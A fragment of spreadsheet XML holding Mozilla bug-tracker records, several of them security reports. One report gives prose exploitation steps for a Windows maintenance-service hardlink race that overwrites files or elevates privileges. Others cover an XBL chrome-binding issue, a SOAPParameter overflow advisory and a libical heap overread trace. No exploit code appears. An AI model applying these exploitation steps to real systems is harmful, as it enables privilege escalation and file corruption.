      <c r="E3663" t="n">
        <v>1</v>
      </c>
      <c r="F3663" t="n">
        <v>1</v>
      </c>
      <c r="G3663" t="n">
        <v>3</v>
      </c>
      <c r="H3663" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3663" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3663" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3663" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3663" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M3663" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3663" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3663" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3663" t="inlineStr">
        <is>
          <t>[land on trunk]</t>
        </is>
      </c>
      <c r="Q3663" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3663" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3663" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T3663" t="n">
        <v>1</v>
      </c>
      <c r="U3663" t="n">
        <v>0</v>
      </c>
      <c r="V3663" t="n">
        <v>12</v>
      </c>
      <c r="W3663" t="inlineStr">
        <is>
          <t>Steps to reproduce:
  In a debug build,
  javascript:new Function("let /*");
Result:
  Assertion failure: let || tt == TOK_VAR,
  at jsparse.c:3471 [@ Variables]
Expected:
  Throw an error with the message "unterminated comment".
Happens both before and after the fix for bug 350268.</t>
        </is>
      </c>
      <c r="X3663" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3664">
      <c r="A3664" t="n">
        <v>1871109</v>
      </c>
      <c r="B3664" t="inlineStr">
        <is>
          <t>2023-12-20 10:45:43 -0800</t>
        </is>
      </c>
      <c r="C3664" t="inlineStr">
        <is>
          <t>generateHash in Manifest.sys.mjs should use sha256 or be removed</t>
        </is>
      </c>
      <c r="D3664" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:50 -0700</t>
        </is>
      </c>
      <c r="E3664" t="n">
        <v>1</v>
      </c>
      <c r="F3664" t="n">
        <v>1</v>
      </c>
      <c r="G3664" t="n">
        <v>3</v>
      </c>
      <c r="H3664" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3664" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3664" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3664" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3664" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3664" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3664" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3664" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3664" t="inlineStr">
        <is>
          <t>[adv-main126+]</t>
        </is>
      </c>
      <c r="Q3664" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3664" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3664" t="inlineStr">
        <is>
          <t>127 Branch</t>
        </is>
      </c>
      <c r="T3664" t="n">
        <v>1</v>
      </c>
      <c r="U3664" t="n">
        <v>0</v>
      </c>
      <c r="V3664" t="n">
        <v>15</v>
      </c>
      <c r="W3664" t="inlineStr">
        <is>
          <t>It's unclear that Manifest.sys.mjs is still used, but if it is, then generateHash should be using a secure hash like sha256. If it isn't, then it should be removed.</t>
        </is>
      </c>
      <c r="X3664" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3665">
      <c r="A3665" t="n">
        <v>1171518</v>
      </c>
      <c r="B3665" t="inlineStr">
        <is>
          <t>2015-06-04 09:02:12 -0700</t>
        </is>
      </c>
      <c r="C3665" t="inlineStr">
        <is>
          <t>[Win] Privileged update processes writing to user writable locations can overwrite non-user writable locations using hard links</t>
        </is>
      </c>
      <c r="D3665" t="inlineStr">
        <is>
          <t>2015-09-01 10:17:13 -0700</t>
        </is>
      </c>
      <c r="E3665" t="n">
        <v>1</v>
      </c>
      <c r="F3665" t="n">
        <v>1</v>
      </c>
      <c r="G3665" t="n">
        <v>3</v>
      </c>
      <c r="H3665" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3665" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3665" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K3665" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3665" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3665" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N3665" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3665" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3665" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main40+][adv-esr38.2+] Will be published by Sept 1</t>
        </is>
      </c>
      <c r="Q3665" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3665" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3665" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T3665" t="n">
        <v>1</v>
      </c>
      <c r="U3665" t="n">
        <v>0</v>
      </c>
      <c r="V3665" t="n">
        <v>46</v>
      </c>
      <c r="W3665" t="inlineStr">
        <is>
          <t>Created attachment 8615375
Proof of Concept
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Steps to reproduce:
Build ID: 20150525141253
OS: Windows
Summary:
The maintenance service creates a log file in a user writable location. It’s possible to change the log file to a hardlink to another file to cause file corruption or elevation of privilege. 
Description:
When the maintenance service starts it creates a log file under c:\programdata\mozilla\logs. This is done in maintenanceservice.cpp/SvcMain. This directory it creates the file in has fairly permissive permissions which allows a normal user to create new files underneath that directory. It’s possible to race the creation of the log file during the service initialization to drop a hardlink to an existing file on the same drive (which is probably the system drive) which when opened by the maintenance service running as local system will cause the file to be overwritten by the log data.
At the very least this would corrupt the target file, however as the user has some control over bits of the contents, such as the updater path, it’s possible to get some user controlled contents in there. This might be used to elevate privileges by overwriting a script file which has a permissive parser, such as powershell, batch or HTA which subsequently gets executed by a privileged process. 
The only slight difficulty in exploitation is that the user cannot directly delete the log file to replace it with a hardlink. However this isn’t a significant issue as before opening the log file the service backs up the log to a new name leaving the directory entry for “maintenanceservice.log” free. Therefore there’s a race condition between the log file being moved out of the way and the new log file being created. 
So to exploit this you perform the following operations:
1. Start a thread which creates a hard link in the log directory to the file you want to overwrite. Repeat until successful.
2. In another thread start the service passing the arbitrary content you want to insert as the path to the updater file
A similar vulnerability exists in the update.status handling, for example in WriteStatusFailure which will write update.status to any location you specify. You can use a hardlink to force an arbitrary file to be overwritten. In this case this would only cause file corruption as the user has no real control on the contents. 
If I could recommend fixes either make the logs directory writable only by administrators or use CopyFile instead of MoveFile when backing up the previous logs. I would not recommend trying to do anything like inspecting the file for hardlinks or similar. 
Proof of Concept:
I’ve attached a proof of concept, it’s written in C#. You’ll need to compile it with the C# csc compiler. NOTE: you might need to run this on a multi-core machine to stand a chance of winning the race. 
1) Compile the PoC with csc.exe Program.cs resulting in Program.exe
2) Execute the PoC passing the name of a file you want to overwrite on the command line. You only need to be able to read the file. 
3) Program should run and print Done if successful
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Actual results:
The target file has been overwritten with the contents of the log file
Expected results:
The log file is created as normal</t>
        </is>
      </c>
      <c r="X3665" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3666">
      <c r="A3666" t="n">
        <v>1043787</v>
      </c>
      <c r="B3666" t="inlineStr">
        <is>
          <t>2014-07-24 21:44:50 -0700</t>
        </is>
      </c>
      <c r="C3666" t="inlineStr">
        <is>
          <t>Chrome level XBL bindings can be triggered from content</t>
        </is>
      </c>
      <c r="D3666" t="inlineStr">
        <is>
          <t>2024-05-30 08:36:04 -0700</t>
        </is>
      </c>
      <c r="E3666" t="n">
        <v>1</v>
      </c>
      <c r="F3666" t="n">
        <v>1</v>
      </c>
      <c r="G3666" t="n">
        <v>3</v>
      </c>
      <c r="H3666" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3666" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3666" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K3666" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3666" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3666" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3666" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3666" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3666" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main34+]</t>
        </is>
      </c>
      <c r="Q3666" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3666" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3666" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T3666" t="n">
        <v>0</v>
      </c>
      <c r="U3666" t="n">
        <v>0</v>
      </c>
      <c r="V3666" t="n">
        <v>12</v>
      </c>
      <c r="W3666" t="inlineStr">
        <is>
          <t>Created attachment 8462331
loadChromeBindings-testcase-new.html
To see this work and begin to understand this issue, when viewing the testcase press the print button.  This could have been very serious if most everything involving anonymous content wasn't already undergoing massive change that we're just fortunate enough to be seeing in the most recent release.
I marked this major, please feel free to correct me if I'm wrong on that, but I don't think I am.  This shouldn't be confused with a previous bug of mine about triggering chrome level bindings because this requires no access to any anonymous content, and is simply due to the complexity of the mozilla source code base.  I could have filed this almost 2 weeks ago, but after testing in the newer nightly builds I could see that a lot of the real danger here is already being mitigated thanks to all the previous XBL torture.  The base issue is actually very simple, There's chrome accessible css sheets that are perfectly fine to be included in content as long as people were always careful to make sure that they declared the XUL namespace as the primary namespace in them, which hasn't been entirely consistent.  Before the most recent update these xul elements were completely accessible from content and that was really worrisome to me.  In the current release and up and it's much safer IMO.  What is happening here is because of the lack of the namespace definition in these files its possible to load include them and use generic elements with the right tag name and class/id definitions to trigger chrome level bindings in content.  I've clearly shown here that its still very possible to manipulate XBL through the WindowProperties Object.  By naming a window that is the window of a sub-document, XBL code in this instance can find the "PrintUtils" object that its looking for because the sandbox that XBL code executes in currently inherits the window that contains the bindings as a prototype.  Clearly it's very lucky that this lines up and that the window has a print function and there's no danger with that at all, but I haven't felt very eager to dig through all the XBL code to look for places where this could be much more serious.  I'm already up way too late for tonight and very tired so Ill leave it at that, just look over the testcase carefully.  Now for tomorrow, I've saved CSRF that's very easy to do and could easily lead to full blown XSS, so until then!</t>
        </is>
      </c>
      <c r="X3666" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3667">
      <c r="A3667" t="n">
        <v>236618</v>
      </c>
      <c r="B3667" t="inlineStr">
        <is>
          <t>2004-03-05 15:35:51 -0800</t>
        </is>
      </c>
      <c r="C3667" t="inlineStr">
        <is>
          <t>Netscape SOAPParameter Constructor Integer Overflow Vulnerability</t>
        </is>
      </c>
      <c r="D3667" t="inlineStr">
        <is>
          <t>2004-08-03 15:25:27 -0700</t>
        </is>
      </c>
      <c r="E3667" t="n">
        <v>1</v>
      </c>
      <c r="F3667" t="n">
        <v>1</v>
      </c>
      <c r="G3667" t="n">
        <v>3</v>
      </c>
      <c r="H3667" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3667" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3667" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3667" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3667" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3667" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3667" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3667" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3667" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q3667" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3667" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3667" t="inlineStr">
        <is>
          <t>mozilla1.7beta</t>
        </is>
      </c>
      <c r="T3667" t="n">
        <v>1</v>
      </c>
      <c r="U3667" t="n">
        <v>0</v>
      </c>
      <c r="V3667" t="n">
        <v>29</v>
      </c>
      <c r="W3667" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Build Identifier: 
iDEFENSE Security Advisory xx.02.04:
I. BACKGROUND
Netscape SOAPParameter Constructor Integer Overflow Vulnerability 
II. DESCRIPTION
Improper input validation to the SOAPParameter object constructor in Netscape 
allows 
execution of arbitrary code.
The SOAPParameter object's constructor contains an integer overflow which 
allows 
contollable heap corruption.
A webpage can be constructed to leverage this into remote execution of 
arbitrary code.
III. ANALYSIS
Successful exploitation allows the remote attacker to execute abitrary code in 
the 
context of the user running the browser.
IV. DETECTION
Netscape version 7.0 and 7.1 have been confirmed to be vulnerable. Mozilla 1.6 
is also 
vulnerable to this issue. It is suspected that earlier versions of both 
browsers may 
also be vulnerable.
V. WORKAROUNDS
Disable Javascript in the browser.
VI. VENDOR RESPONSE
VII. CVE INFORMATION
VIII. DISCLOSURE TIMELINE
January 17, 2004      Exploit acquired by iDEFENSE.
IX. CREDIT
zen-parse (zen-parse at gmx.net) is credited with this discovery.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X3667" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3668">
      <c r="A3668" t="n">
        <v>1154319</v>
      </c>
      <c r="B3668" t="inlineStr">
        <is>
          <t>2015-04-14 08:43:03 -0700</t>
        </is>
      </c>
      <c r="C3668" t="inlineStr">
        <is>
          <t>Release notes for 4.2.14</t>
        </is>
      </c>
      <c r="D3668" t="inlineStr">
        <is>
          <t>2015-04-14 20:08:52 -0700</t>
        </is>
      </c>
      <c r="E3668" t="n">
        <v>1</v>
      </c>
      <c r="F3668" t="n">
        <v>1</v>
      </c>
      <c r="G3668" t="n">
        <v>4</v>
      </c>
      <c r="H3668" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3668" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3668" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3668" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3668" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3668" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3668" t="inlineStr"/>
      <c r="Q3668" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3668" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3668" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T3668" t="n">
        <v>1</v>
      </c>
      <c r="U3668" t="n">
        <v>0</v>
      </c>
      <c r="V3668" t="n">
        <v>6</v>
      </c>
      <c r="W3668" t="inlineStr">
        <is>
          <t>Release notes changes describing fixed/improvements since last release.</t>
        </is>
      </c>
      <c r="X3668" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3669">
      <c r="A3669" t="n">
        <v>1281043</v>
      </c>
      <c r="B3669" t="inlineStr">
        <is>
          <t>2016-06-20 13:20:34 -0700</t>
        </is>
      </c>
      <c r="C3669" t="inlineStr">
        <is>
          <t>Heap overread in libical icalparser_parse_string -&gt; icaltime_from_string function</t>
        </is>
      </c>
      <c r="D3669" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:33 -0700</t>
        </is>
      </c>
      <c r="E3669" t="n">
        <v>1</v>
      </c>
      <c r="F3669" t="n">
        <v>1</v>
      </c>
      <c r="G3669" t="n">
        <v>2</v>
      </c>
      <c r="H3669" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3669" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J3669" t="inlineStr">
        <is>
          <t>Internal Components</t>
        </is>
      </c>
      <c r="K3669" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3669" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3669" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3669" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3669" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P3669" t="inlineStr"/>
      <c r="Q3669" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3669" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3669" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3669" t="n">
        <v>0</v>
      </c>
      <c r="U3669" t="n">
        <v>0</v>
      </c>
      <c r="V3669" t="n">
        <v>8</v>
      </c>
      <c r="W3669" t="inlineStr">
        <is>
          <t>Created attachment 8763673
caltime.ics
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Steps to reproduce:
Creating a small test harness passing a given input to the icalparser_parse_string function, I found the attached testcase causes a heap overread in icaltime_from_string. This was tested against latest libical and 0.47 from Thunderbird.
Code calling icalparser_parse_string can be found here: https://dxr.mozilla.org/comm-central/search?q=icalparser_parse_string
Actual results:
=================================================================
==25313==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ec03 at pc 0x000000602b21 bp 0x7ffd746ec2b0 sp 0x7ffd746ec2a8
READ of size 1 at 0x60300000ec03 thread T0
    #0 0x602b20 in icaltime_from_string (/root/tmp/new_parse/parse_string047_asan+0x602b20)
    #1 0x510498 in icalvalue_new_from_string_with_error (/root/tmp/new_parse/parse_string047_asan+0x510498)
    #2 0x512f76 in icalvalue_new_from_string (/root/tmp/new_parse/parse_string047_asan+0x512f76)
    #3 0x4f4773 in icalparser_add_line (/root/tmp/new_parse/parse_string047_asan+0x4f4773)
    #4 0x4efabe in icalparser_parse (/root/tmp/new_parse/parse_string047_asan+0x4efabe)
    #5 0x4f9c1f in icalparser_parse_string (/root/tmp/new_parse/parse_string047_asan+0x4f9c1f)
    #6 0x4eb7ef in main (/root/tmp/new_parse/parse_string047_asan+0x4eb7ef)
    #7 0x7f3162c68a3f in __libc_start_main /build/glibc-ryFjv0/glibc-2.21/csu/libc-start.c:289
    #8 0x444ae8 in _start (/root/tmp/new_parse/parse_string047_asan+0x444ae8)
0x60300000ec03 is located 2 bytes to the right of 17-byte region [0x60300000ebf0,0x60300000ec01)
allocated by thread T0 here:
    #0 0x4cbab2 in malloc (/root/tmp/new_parse/parse_string047_asan+0x4cbab2)
    #1 0x5c443d in icalmemory_new_buffer (/root/tmp/new_parse/parse_string047_asan+0x5c443d)
    #2 0x4ed798 in make_segment (/root/tmp/new_parse/parse_string047_asan+0x4ed798)
    #3 0x4f7325 in parser_get_next_value (/root/tmp/new_parse/parse_string047_asan+0x4f7325)
    #4 0x4f42ca in icalparser_add_line (/root/tmp/new_parse/parse_string047_asan+0x4f42ca)
    #5 0x4efabe in icalparser_parse (/root/tmp/new_parse/parse_string047_asan+0x4efabe)
    #6 0x4f9c1f in icalparser_parse_string (/root/tmp/new_parse/parse_string047_asan+0x4f9c1f)
    #7 0x4eb7ef in main (/root/tmp/new_parse/parse_string047_asan+0x4eb7ef)
    #8 0x7f3162c68a3f in __libc_start_main /build/glibc-ryFjv0/glibc-2.21/csu/libc-start.c:289
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 icaltime_from_string
Shadow bytes around the buggy address:
  0x0c067fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00 00
=&gt;0x0c067fff9d80:[01]fa fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
  0x0c067fff9d90: fd fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
  0x0c067fff9da0: fa fa fd fd fd fd fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff9db0: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff9dc0: fd fd fd fd fa fa fd fd fd fd fa fa 00 00 00 00
  0x0c067fff9dd0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa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5313==ABORTING
Expected results:
Not overread the allocated buffer</t>
        </is>
      </c>
      <c r="X3669" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3670">
      <c r="A3670" t="n">
        <v>1230639</v>
      </c>
      <c r="B3670" t="inlineStr">
        <is>
          <t>2015-12-04 11:28:50 -0800</t>
        </is>
      </c>
      <c r="C3670" t="inlineStr">
        <is>
          <t>"ASSERTION: All class values should be StoresOwnData and parsedvia Element::BeforeSetAttr, so available here"</t>
        </is>
      </c>
      <c r="D3670" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:34 -0700</t>
        </is>
      </c>
      <c r="E3670" t="n">
        <v>1</v>
      </c>
      <c r="F3670" t="n">
        <v>1</v>
      </c>
      <c r="G3670" t="n">
        <v>3</v>
      </c>
      <c r="H3670" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3670" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3670" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K3670" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3670" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3670" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3670" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3670" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3670" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q3670" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3670" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3670" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3670" t="n">
        <v>1</v>
      </c>
      <c r="U3670" t="n">
        <v>0</v>
      </c>
      <c r="V3670" t="n">
        <v>18</v>
      </c>
      <c r="W3670" t="inlineStr">
        <is>
          <t>Created attachment 8695997
testcase
###!!! ASSERTION: All class values should be StoresOwnData and parsedvia Element::BeforeSetAttr, so available here: 'otherClasses || aData-&gt;mModType == nsIDOMMutationEvent::REMOVAL', file layout/style/nsCSSRuleProcessor.cpp, line 3018
This assertion is part of code added in https://hg.mozilla.org/mozilla-central/rev/ec4b62affc04 (bug 1184842)
Btw, there's a typo in the assertion ("parsedvia").</t>
        </is>
      </c>
      <c r="X3670" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3671">
      <c r="A3671" t="n">
        <v>206780</v>
      </c>
      <c r="B3671" t="inlineStr">
        <is>
          <t>2003-05-22 13:13:04 -0700</t>
        </is>
      </c>
      <c r="C3671" t="inlineStr">
        <is>
          <t>Can't set many non-Western fonts (need port from xpfe)</t>
        </is>
      </c>
      <c r="D3671" t="inlineStr">
        <is>
          <t>2006-08-27 06:56:52 -0700</t>
        </is>
      </c>
      <c r="E3671" t="n">
        <v>1</v>
      </c>
      <c r="F3671" t="n">
        <v>1</v>
      </c>
      <c r="G3671" t="n">
        <v>2</v>
      </c>
      <c r="H3671" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3671" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3671" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K3671" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3671" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3671" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3671" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3671" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3671" t="inlineStr"/>
      <c r="Q3671" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3671" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3671" t="inlineStr">
        <is>
          <t>Firebird0.7</t>
        </is>
      </c>
      <c r="T3671" t="n">
        <v>1</v>
      </c>
      <c r="U3671" t="n">
        <v>1</v>
      </c>
      <c r="V3671" t="n">
        <v>24</v>
      </c>
      <c r="W3671" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4b) Gecko/20030522 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4b) Gecko/20030522 Mozilla Firebird/0.6
Bug #110655 fixed for mozilla but not for firebird- at least not completely: the
first time I open the font prefs, I get mozilla like ui, and I am able to change
the Hebrew fonts.
Any time after, I get fb ui, and I am unable to change any of the Hebrew fonts
I am on osx 10.2.6
Reproducible: Always
Steps to Reproduce:
1. application menu-- prefrences
2. fonts -- for the encoding -- hebre
3. change the font from the default. ok.
4. go back to the fonts and try to change
Actual Results:  
no items in the drop down list for Hebrew fonts
Expected Results:  
shuld list avalible fonts</t>
        </is>
      </c>
      <c r="X3671" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3672">
      <c r="A3672" t="n">
        <v>602974</v>
      </c>
      <c r="B3672" t="inlineStr">
        <is>
          <t>2010-10-08 13:27:29 -0700</t>
        </is>
      </c>
      <c r="C3672" t="inlineStr">
        <is>
          <t>lxml raises exception when parsing, e.g. disallowed DOCTYPE and comment</t>
        </is>
      </c>
      <c r="D3672" t="inlineStr">
        <is>
          <t>2010-10-28 14:03:26 -0700</t>
        </is>
      </c>
      <c r="E3672" t="n">
        <v>1</v>
      </c>
      <c r="F3672" t="n">
        <v>1</v>
      </c>
      <c r="G3672" t="n">
        <v>5</v>
      </c>
      <c r="H3672" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3672" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3672" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3672" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3672" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3672" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3672" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3672" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3672" t="inlineStr"/>
      <c r="Q3672" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3672" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3672" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T3672" t="n">
        <v>1</v>
      </c>
      <c r="U3672" t="n">
        <v>0</v>
      </c>
      <c r="V3672" t="n">
        <v>6</v>
      </c>
      <c r="W3672" t="inlineStr">
        <is>
          <t>This was reproed with a 
&lt;!DOCTYPE &gt; followed by a &lt;!-- comment &lt;with tag&gt; --&gt; and plain text
The exception doesn't occur if:
* removing the tags inside the comment OR
* wrapping the plain text in e.g. &lt;p&gt; OR
* removing the &lt;!DOCTYPE &gt; part
Seems like an edge case, but we may want to have better behavior than raising a 500 in the document view...
More details:
http://paulc.pastebin.mozilla.org/810394</t>
        </is>
      </c>
